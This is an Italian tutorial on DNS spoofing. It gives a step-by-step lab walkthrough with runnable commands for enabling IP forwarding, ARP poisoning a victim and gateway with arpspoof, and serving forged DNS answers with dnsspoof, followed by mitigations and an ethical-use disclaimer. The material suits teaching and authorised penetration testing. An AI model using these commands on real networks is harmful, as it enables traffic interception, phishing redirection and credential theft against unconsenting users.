Tutorials

Guida Approfondita al DNS Spoofing

Il DNS Spoofing è una tecnica di attacco in cui un aggressore invia risposte DNS false a una vittima, facendo credere al sistema che un determinato dominio punti a un indirizzo IP controllato dall'att

#networking

Guida Approfondita al DNS Spoofing

Cos'è il DNS Spoofing

Il DNS Spoofing è una tecnica di attacco in cui un aggressore invia risposte DNS false a una vittima, facendo credere al sistema che un determinato dominio punti a un indirizzo IP controllato dall'attaccante. Questo consente di reindirizzare il traffico della vittima verso un sito malevolo o un server controllato dall'attaccante.

Obiettivi dell'attacco DNS Spoofing

  • Reindirizzare le vittime verso pagine web fasulle (phishing).
  • Intercettare credenziali o altri dati sensibili.
  • Sfruttare ulteriori vulnerabilità nei servizi esposti.

Requisiti per il DNS Spoofing

  • Accesso alla stessa rete locale della vittima (LAN).
  • IP forwarding abilitato.
  • Strumenti come dnsspoof, arpspoof e ettercap disponibili (Kali Linux li include di default).

Configurazione della rete

Esempio:

  • Kali Linux: 192.168.2.238
  • Gateway: 192.168.2.1
  • Vittima: 192.168.2.148

Passaggi per effettuare un attacco DNS Spoofing

1. Abilitare l'IP Forwarding

Permette al traffico intercettato di essere inoltrato correttamente.

bash
echo 1 > /proc/sys/net/ipv4/ip_forward

2. ARP Spoofing (Man-in-the-Middle)

Inganna la vittima e il gateway facendo credere di essere uno l'altro.

bash
arpspoof -i eth0 -t 192.168.2.148 192.168.2.1
arpspoof -i eth0 -t 192.168.2.1 192.168.2.148

3. Preparare il file DNS per dnsspoof

Questo file definisce le risposte DNS false. Esempio file dns.txt:

bash
192.168.2.238 sportsfoo.com
192.168.2.238 *.sportsfoo.com

4. Avviare dnsspoof

bash
dnsspoof -i eth0 -f dns.txt

Nota: assicurati di eseguire il comando come root (UID 0), altrimenti riceverai un errore.

5. Interazione della vittima

La vittima deve accedere a \sportsfoo.com\share o un dominio incluso nel file DNS per attivare la spoofing.

Considerazioni di Sicurezza

  • Il DNS Spoofing è efficace solo in reti non segmentate o non protette da tecnologie come DNSSEC.
  • Può essere mitigato tramite static ARP, utilizzo di HTTPS e DNS over HTTPS (DoH).

Tool Alternativi

  • Ettercap: più completo, interfaccia grafica e plugin.
  • Bettercap: moderna e modulare.
  • Responder: utile per intercettare anche credenziali SMB/LLMNR.

Conclusione

Il DNS Spoofing è una tecnica potente ma facilmente rilevabile in ambienti monitorati. Deve essere usato con cautela solo in contesti autorizzati e a fini didattici o di penetration testing etico.

Per integrazione con SMB Relay, vedere la guida correlata nell'ambiente di laboratorio configurato.